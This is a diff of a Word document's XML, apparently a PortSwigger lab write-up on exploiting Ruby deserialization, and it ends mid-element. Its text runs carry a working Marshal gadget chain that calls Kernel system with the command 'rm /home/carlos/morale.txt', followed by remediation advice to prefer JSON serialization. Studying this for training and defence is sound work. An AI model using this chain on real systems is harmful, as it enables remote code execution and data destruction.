--- a/PortSwigger Labs/Advanced Topics/Insecure Deserialization/Lab 6 - Exploiting Ruby deserialization using a documented gadget chain.docx
+++ b/PortSwigger Labs/Advanced Topics/Insecure Deserialization/Lab 6 - Exploiting Ruby deserialization using a documented gadget chain.docx
@@ -442,6 +442,7 @@
         </w:rPr>
         <w:t>Gem::</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -451,6 +452,7 @@
         </w:rPr>
         <w:t>SpecFetcher</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -511,7 +513,25 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> the payload from running when we Marshal.dump it</w:t>
+        <w:t xml:space="preserve"> the payload from running when we </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Marshal.dump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -562,8 +582,18 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">    def marshal_dump</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    def </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>marshal_dump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -659,6 +689,7 @@
         </w:rPr>
         <w:t>Net::</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -666,24 +697,43 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>WriteAdapter.new(Kernel, :system)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">rs = </w:t>
+        <w:t>WriteAdapter.new</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(Kernel, :system)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>rs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -694,6 +744,7 @@
         </w:rPr>
         <w:t>Gem::</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -703,15 +754,17 @@
         </w:rPr>
         <w:t>RequestSet.allocate</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -728,17 +781,27 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set('@sets', wa1)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>_variable_set</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>('@sets', wa1)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -755,7 +818,52 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set('@git_set', "rm /home/carlos/morale.txt")</w:t>
+        <w:t>_variable_set</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>('@</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>git_set</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>', "rm /home/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>carlos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>/morale.txt")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -783,6 +891,7 @@
         </w:rPr>
         <w:t>Net::</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -790,24 +899,61 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>WriteAdapter.new(rs, :resolve)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">i = </w:t>
+        <w:t>WriteAdapter.new</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>rs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>, :resolve)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -825,17 +971,28 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Package::TarReader::Entry.allocate</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>Package::TarReader::</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Entry.allocate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -851,7 +1008,16 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>set(</w:t>
+        <w:t>set</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -871,6 +1037,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -886,7 +1053,16 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>set(</w:t>
+        <w:t>set</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -895,7 +1071,25 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>'@header', "aaa")</w:t>
+        <w:t>'@header', "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>aaa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -923,6 +1117,7 @@
         </w:rPr>
         <w:t>Net::</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -932,15 +1127,17 @@
         </w:rPr>
         <w:t>BufferedIO.allocate</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -957,17 +1154,45 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set('@io', i)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>_variable_set</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">('@io', </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -984,7 +1209,34 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set('@debug_output', wa2)</w:t>
+        <w:t>_variable_set</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>('@</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>debug_output</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>', wa2)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1019,17 +1271,28 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Package::TarReader.allocate</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>Package::</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>TarReader.allocate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -1046,7 +1309,16 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set('@io', n)</w:t>
+        <w:t>_variable_set</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>('@io', n)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1074,6 +1346,7 @@
         </w:rPr>
         <w:t>Gem::</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -1083,15 +1356,17 @@
         </w:rPr>
         <w:t>Requirement.allocate</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -1108,24 +1383,51 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>_variable_set('@requirements', t)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>payload = Marshal.dump([</w:t>
+        <w:t>_variable_set</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>('@requirements', t)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">payload = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Marshal.dump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>([</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -1136,6 +1438,7 @@
         </w:rPr>
         <w:t>Gem::</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
@@ -1143,7 +1446,16 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>SpecFetcher, Gem::Installer, r])</w:t>
+        <w:t>SpecFetcher</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>, Gem::Installer, r])</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1190,12 +1502,278 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Secure Configuration:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ensure that your Ruby on Rails application is configured securely. This means ensuring that potentially harmful configurations like </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>config.action</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>_dispatch.cookies_serializer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> are set to JSON rather than Marshal, which is the Ruby object serialization format. The JSON serializer does not allow object deserialization and is a safer option.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Disable Unsafe Methods:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ensure that potentially harmful methods like </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Kernel.eval</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
